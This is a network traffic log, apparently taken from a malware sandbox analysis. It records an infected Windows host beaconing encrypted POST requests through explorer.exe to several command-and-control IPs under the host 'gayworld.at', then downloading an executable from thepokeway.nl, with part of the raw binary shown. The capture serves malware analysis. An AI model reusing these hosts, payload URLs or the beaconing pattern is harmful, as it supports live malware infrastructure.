                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  32 | 192.168.2.5 | 49727 | 123.213.233.194 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Oct 10, 2022 23:21:43.610588074 CEST | 182 | OUT | POST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://slnpxfm.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 268
                  Host: gayworld.at
                  Oct 10, 2022 23:21:43.610588074 CEST | 183 | OUT | Data Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 17 6b 2c 90 f5 76 0b 75 3a 50 e2 e2
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vu:PXr}aT~\*/g5Wk]3M},j{t#&j{V0'|jC\ kuC>MdeS$
                  Oct 10, 2022 23:21:44.790632963 CEST | 183 | IN | HTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:21:44 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  33 | 192.168.2.5 | 49728 | 123.213.233.194 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Oct 10, 2022 23:21:45.102165937 CEST | 184 | OUT | POST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://nnpxrhckg.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 307
                  Host: gayworld.at
                  Oct 10, 2022 23:21:45.105804920 CEST | 185 | OUT | Data Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 14 6b 2c 90 f5 76 0b 75 2b 25 c2 9b
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vu+%QNf7*#I*=A{P!MK)_At-24@}/"!PJK56c *9&:Hb75U(f]oQ
                  Oct 10, 2022 23:21:46.274468899 CEST | 185 | IN | HTTP/1.1 200 OK
                  Date: Mon, 10 Oct 2022 21:21:45 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 0
                  Connection: close
                  Content-Type: text/html; charset=utf-8


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  34 | 192.168.2.5 | 49729 | 175.120.254.9 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Oct 10, 2022 23:21:46.586225986 CEST | 186 | OUT | POST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://dotgqhetjk.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 144
                  Host: gayworld.at
                  Oct 10, 2022 23:21:46.586250067 CEST | 186 | OUT | Data Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 15 6b 2c 90 f5 76 0b 75 40 21 f9 bd
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vu@!gkfn9=C=+)J_{GLUg]
                  Oct 10, 2022 23:21:47.767224073 CEST | 187 | IN | HTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:21:47 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 50
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 1f 62 43 e4 37 01 fe ef 46 ea d0 ec a6 6d 81 3e d9 f7 22 5e 5a 85 84 8b cb 7c 9a 2e 1d 03
                  Data Ascii: #\6bC7Fm>"^Z|.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  35 | 192.168.2.5 | 49731 | 185.95.186.58 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Oct 10, 2022 23:21:49.526122093 CEST | 809 | OUT | POST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://xkovywjrdl.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 179
                  Host: gayworld.at
                  Oct 10, 2022 23:21:49.528737068 CEST | 810 | OUT | Data Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 15 6b 2c 90 f4 76 0b 75 52 0b d8 b6
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA ,[k,vuRNuf#RbZJ.r{R~$kVEC"P4m0P@j(C!'
                  Oct 10, 2022 23:21:49.898238897 CEST | 810 | IN | HTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:21:49 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  4 | 192.168.2.5 | 49697 | 195.158.3.162 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Oct 10, 2022 23:20:43.995908022 CEST | 108 | OUT | POST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://cqvxwnkwk.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 112
                  Host: gayworld.at
                  Oct 10, 2022 23:20:43.995985985 CEST | 108 | OUT | Data Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 2e 4a b9 fc
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vu.JG8ob@L$X
                  Oct 10, 2022 23:20:44.546792030 CEST | 109 | IN | HTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:20:44 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  5 | 192.168.2.5 | 49698 | 123.213.233.194 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Oct 10, 2022 23:20:44.841478109 CEST | 110 | OUT | POST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://lqmaakrhx.net/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 256
                  Host: gayworld.at
                  Oct 10, 2022 23:20:44.841505051 CEST | 110 | OUT | Data Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 24 0a c8 a3
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vu$fO}qH`!f.fD,i `=M(<,Ajt6X2h,*%^6 zfr\7GsM{0_ciBB!
                  Oct 10, 2022 23:20:45.722624063 CEST | 111 | IN | HTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:20:45 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  6 | 192.168.2.5 | 49699 | 195.158.3.162 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Oct 10, 2022 23:20:45.875778913 CEST | 112 | OUT | POST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://dhmlysw.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 222
                  Host: gayworld.at
                  Oct 10, 2022 23:20:45.875801086 CEST | 112 | OUT | Data Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 50 5a e0 8b
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vuPZxMxH&Si9&(NGGI0$OZH2.+U~neWa) >$Yz{Z@%4xuw@5
                  Oct 10, 2022 23:20:46.409559011 CEST | 113 | IN | HTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:20:46 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  7 | 192.168.2.5 | 49700 | 211.171.233.126 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Oct 10, 2022 23:20:46.940022945 CEST | 114 | OUT | POST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://lgjjdpyb.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 216
                  Host: gayworld.at
                  Oct 10, 2022 23:20:46.940022945 CEST  114  OUT  Data Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 7c 0d e4 e4
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vu|f{FkMbKZ vk;bxdY4SMzP?,R, N^.Yz zb$H'J@
                  Oct 10, 2022 23:20:47.920043945 CEST  115  IN  HTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:20:47 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                  8  192.168.2.5  49701  211.171.233.126  80  C:\Windows\explorer.exe
                  Timestamp  kBytes transferred  Direction  Data
                  Oct 10, 2022 23:20:48.233144999 CEST  116  OUT  POST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://ymxif.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 237
                  Host: gayworld.at
                  Oct 10, 2022 23:20:48.233159065 CEST  116  OUT  Data Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 4f 50 de 9f
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vuOPQMzlsJ6R=~i_(8h>8SF6"\a4dGt"_1|=N:F5fQ,;tFl
                  Oct 10, 2022 23:20:49.232600927 CEST  117  IN  HTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:20:48 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                  9  192.168.2.5  49702  175.120.254.9  80  C:\Windows\explorer.exe
                  Timestamp  kBytes transferred  Direction  Data
                  Oct 10, 2022 23:20:49.530167103 CEST  118  OUT  POST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://wjwailraw.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 275
                  Host: gayworld.at
                  Oct 10, 2022 23:20:49.530184031 CEST  118  OUT  Data Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 64 40 fd 8b
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vud@UB["HFR qfv)djaFA]\7?FPUN<!|3ONl.e<aSt6T8coEbw4fGFLHz
                  Oct 10, 2022 23:20:50.714776039 CEST  119  IN  HTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:20:50 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                  0  192.168.2.5  49711  87.250.250.50  443  C:\Windows\explorer.exe
                  Timestamp  kBytes transferred  Direction  Data
                  2022-10-10 21:21:22 UTC  0  OUT  GET /d/aS1IzKYGKL0Ctw HTTP/1.1
                  Connection: Keep-Alive
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Host: disk.yandex.ru
                  2022-10-10 21:21:22 UTC  0  IN  HTTP/1.1 200 OK
                  Connection: Close
                  Content-Length: 10538
                  Content-Security-Policy: default-src 'none'; script-src yastatic.net 'nonce-KX+0hQL3oDs++2xLIm8h+Q==' 'unsafe-inline' mc.yandex.ru mc.webvisor.com mc.webvisor.org mc.yandex.com mc.yandex.by mc.yandex.com.tr mc.yandex.kz mc.yandex.ua mc.yandex.az mc.yandex.co.il mc.yandex.com.am mc.yandex.com.ge mc.yandex.ee mc.yandex.fr mc.yandex.kg mc.yandex.lt mc.yandex.lv mc.yandex.md mc.yandex.tj mc.yandex.tm mc.yandex.uz https://frontend.vh.yandex.ru https://yastatic.net an.yandex.ru storage.mds.yandex.net; style-src yastatic.net 'unsafe-inline'; font-src yastatic.net; object-src yastatic.net 'self'; img-src yastatic.net 'self' data: https://avatars.mds.yandex.net storage.mds.yandex.net https://yapic.yandex.net downloader.disk.yandex.ru downloader.disk.yandex.net yandex.ru mc.webvisor.com mc.webvisor.org mc.yandex.com mc.yandex.by mc.yandex.com.tr mc.yandex.kz mc.yandex.ru mc.yandex.ua mc.yandex.az mc.yandex.co.il mc.yandex.com.am mc.yandex.com.ge mc.yandex.ee mc.yandex.fr mc.yandex.kg mc.yandex.lt mc.yandex.lv mc.yandex.md mc.yandex.tj mc.yandex.tm mc.yandex.uz mc.admetrica.ru strm.yandex.ru an.yandex.ru *.weborama.fr view.adjust.com view.atdmt.com comscore.com s1.countby.com bl1.datamind.ru *.doubleclick.net secure-it.imrworldwide.com lamoda25.ru omirussia.ru amch.questionmarket.com r24-tech.com yandex.dsp.redfog.ru yandex-bidder.rutarget.ru eu-propulsor.sociomantic.com tns.ru gemius.pl adfox.ru pixel.adlooxtracking.com avatars-fast.yandex.net favicon.yandex.net banners.adfox.ru content.adfox.ru ads6.adfox.ru yastat.net avatars.mds.yandex.net *.tns-counter.ru *.verify.yandex.ru verify.yandex.ru ads.adfox.ru bs.serving-sys.com bs.serving-sys.ru ad.adriver.ru wcm.solution.weborama.fr wcm-ru.frontend.weborama.fr ad.doubleclick.net rgi.io track.rutarget.ru ssl.hurra.com amc.yandex.ru gdeby.hit.gemius.pl tps.doubleverify.com pixel.adsafeprotected.com impression.appsflyer.com pixel.adlooxtracking.ru; connect-src 'self' yandex.ru mail.yandex.ru 
api.passport.yandex.ru yandexmetrica.com:* mc.webvisor.com mc.webvisor.org mc.yandex.com mc.yandex.by mc.yandex.com.tr mc.yandex.kz mc.yandex.ru mc.yandex.ua mc.yandex.az mc.yandex.co.il mc.yandex.com.am mc.yandex.com.ge mc.yandex.ee mc.yandex.fr mc.yandex.kg mc.yandex.lt mc.yandex.lv mc.yandex.md mc.yandex.tj mc.yandex.tm mc.yandex.uz mc.admetrica.ru strm.yandex.ru log.strm.yandex.ru streaming.disk.yandex.net csp.yandex.net blob: an.yandex.ru *.strm.yandex.net verify.yandex.ru *.verify.yandex.ru yandex.st yastatic.net matchid.adfox.yandex.ru adfox.yandex.ru ads.adfox.ru ads6.adfox.ru jstracer.yandex.ru yastat.net tps.doubleverify.com pixel.adsafeprotected.com amc.yandex.ru; frame-src yastatic.net 'self' yandex-disk: blob: downloader.disk.yandex.ru downloader.disk.yandex.net *.storage.yandex.net *.disk.yandex.net mc.yandex.ru mc.yandex.md https://frontend.vh.yandex.ru https://yastatic.net; media-src downloader.disk.yandex.ru downloader.disk.yandex.net *.storage.yandex.net *.disk.yandex.net blob: data: *.yandex.net strm.yandex.ru *.strm.yandex.ru yastat.net; child-src blob: mc.yandex.ru; frame-ancestors webvisor.com *.webvisor.com http://webvisor.com http://*.webvisor.com; report-uri https://csp.yandex.net/csp?from=disk-public&project=disk-public&yandex_login=&yandexuid=7822820781665436882;
                  Content-Type: text/html; charset=utf-8
                  Date: Mon, 10 Oct 2022 21:21:22 GMT
                  ETag: W/"292a-rvlHBnmkF8sIvadX6wpTryjUgjQ"
                  Set-Cookie: yandexuid=7822820781665436882; Max-Age=315360000; Domain=.yandex.ru; Path=/; Expires=Thu, 07 Oct 2032 21:21:22 GMT; Secure
                  Set-Cookie: _yasc=cWi7jspuEBmaVyNUoLz8h5oI+0/+hXawu4SpJg2wdOlT5Q==; domain=.yandex.ru; path=/; expires=Wed, 09-Nov-2022 21:21:22 GMT; secure
                  Set-Cookie: i=8giXSIK595ibKwJwJ+ycfuQ6bXMOAcgpQyRV//BofUnBJl45OsTp2Spv6xU1+RuYfBzP0wcsj9Rb2PoOpIsNr8jG2+Q=; Expires=Wed, 09-Oct-2024 21:21:22 GMT; Domain=.yandex.ru; Path=/; Secure; HttpOnly
                  Vary: Accept-Encoding
                  X-Content-Type-Options: nosniff
                  X-Frame-Options: SAMEORIGIN
                  X-Robots-Tag: noindex, noarchive, nofollow
                  Data Ascii: <!DOCTYPE html><html lang="ru"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><title> </title><styl


                  Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                  1  192.168.2.5  49730  5.135.247.111  443  C:\Windows\explorer.exe
                  Timestamp  kBytes transferred  Direction  Data
                  2022-10-10 21:21:47 UTC  14  OUT  GET /upload/index.php HTTP/1.1
                  Connection: Keep-Alive
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Host: thepokeway.nl
                  2022-10-10 21:21:47 UTC  14  IN  HTTP/1.1 200 OK
                  Date: Mon, 10 Oct 2022 21:21:47 GMT
                  Server: Apache
                  Content-Description: File Transfer
                  Content-Disposition: attachment; filename=c08d5be9.exe
                  Content-Transfer-Encoding: binary
                  Expires: 0
                  Cache-Control: must-revalidate
                  Pragma: public
                  Vary: Accept-Encoding
                  Connection: close
                  Transfer-Encoding: chunked
                  Content-Type: application/octet-stream
                  Data Ascii: 1ff8*`TuED){^AdLGp8b:70,[0<?cIcbq[]7IQ(p\c_tjVEKo4Ua9tQi@AjU%#5wZ.y%6OO&^Zcdq[hvN/TdHkDc
                  2022-10-10 21:21:48 UTC143INData Raw: 32 30 30 30 0d 0a
                  Data Ascii: 2000
                  2022-10-10 21:21:48 UTC143INData Raw: 31 f0 b2 7d a0 ad ca e0 36 7c 52 e8 9b 5a f4 0d 08 54 7b d5 57 18 8f e9 a9 b5 94 b3 ef 49 cf 07 81 39 48 3b 33 fc c8 a0 6e ec 41 0f 1b b3 ef b5 8c 93 f2 f4 75 b2 9a dc e1 93 62 6f e3 52 78 c5 5b 16 4d 45 1a eb 06 6b 07 2f 02 05 f7 d1 e1 f7 c5 d7 a6 4e e6 41 d7 1b fd 5a c1 2e a1 61 97 de 66 ea 32 7c 25 59 e3 91 3c ee 3f 13 63 f9 73 82 56 49 95 2f 4a 04 eb 56 35 83 5e a9 42 b7 dc 6d d8 e5 8a 40 5d d6 4f 8a b8 b8 a5 4a 05 14 e3 a3 93 76 15 06 c3 39 47 56 ec f7 06 f8 28 5f 8b b1 cb 02 e9 0f 53 44 a8 63 8a 1e 94 70 3b 43 79 00 c1 9b bf d5 b9 1a 62 07 00 62 68 63 11 2c 75 db c7 5c 6a ab ec 86 b0 66 9a 88 8e 39 cf 7b 7b 39 01 a4 0f 59 f8 a7 82 e2 8c ea 65 71 85 af 77 4a 30 c7 a0 e2 06 f1 e2 02 0b f5 f0 b6 49 d0 83 6d f3 9c a0 96 58 93 1d 8d 91 4c 24 2e 11 2a 11
                  Data Ascii: 1}6|RZT{WI9H;3nAuboRx[MEk/NAZ.af2|%Y<?csVI/JV5^Bm@]OJv9GV(_SDcp;Cybbhc,u\jf9{{9YeqwJ0ImXL$.*
                  2022-10-10 21:21:48 UTC151INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC151INData Raw: 32 30 30 30 0d 0a 77 ac 09 0f 6f c0 ff 33 73 cd f2 e2 16 8e 8c 9d 54 e7 8c db 6c 90 34 dd dc bd 9c 8f 3d 64 b6 c2 c5 b6 34 ca c2 c3 58 36 ec 6b ab ba 49 82 30 dc a9 30 09 44 9d 29 07 99 83 7d b6 76 19 e8 20 77 bd 05 50 91 d1 d0 dd 2a 4e ad 3b 99 dc da 3b 0b b1 fb 1c 10 f8 0d 9e 63 1b 43 71 5f a5 5d e0 d9 f6 af b3 7f 57 f3 7e 7d 2b 34 0f c6 87 e4 11 e3 42 18 db ea 8f 36 be 8e 59 30 aa a3 ba 04 ed 92 c8 f8 f7 17 87 bb 8a 9a be 88 9c 81 72 70 24 74 b2 ff 20 01 d1 30 0f 8b ff 04 14 a5 67 16 79 c8 c8 ae 3b 2f e3 e8 6b a9 12 bf 60 a9 84 cd e1 f5 e6 c7 9e 35 a6 32 e9 ea d2 6d b9 88 b7 af 07 a4 00 18 2f 5c 04 e8 93 ec 4c 91 40 d3 75 ab 4e d0 d2 7a 8b 39 57 f7 9c 0e aa 48 94 d6 6a ae e2 fa 57 03 80 77 cb e2 3d 46 03 ce 8e 5b 50 66 14 2c 1b 9a 21 cf 5e 47 8b 8a f3
                  Data Ascii: 2000wo3sTl4=d4X6kI00D)}v wP*N;;cCq_]W~}+4B6Y0rp$t 0gy;/k`52m/\L@uNz9WHjWw=F[Pf,!^G
                  2022-10-10 21:21:48 UTC159INData Raw: cb 0e 02 43 9f 81
                  Data Ascii: C
                  2022-10-10 21:21:48 UTC159INData Raw: 0d 0a
                  Data Ascii:
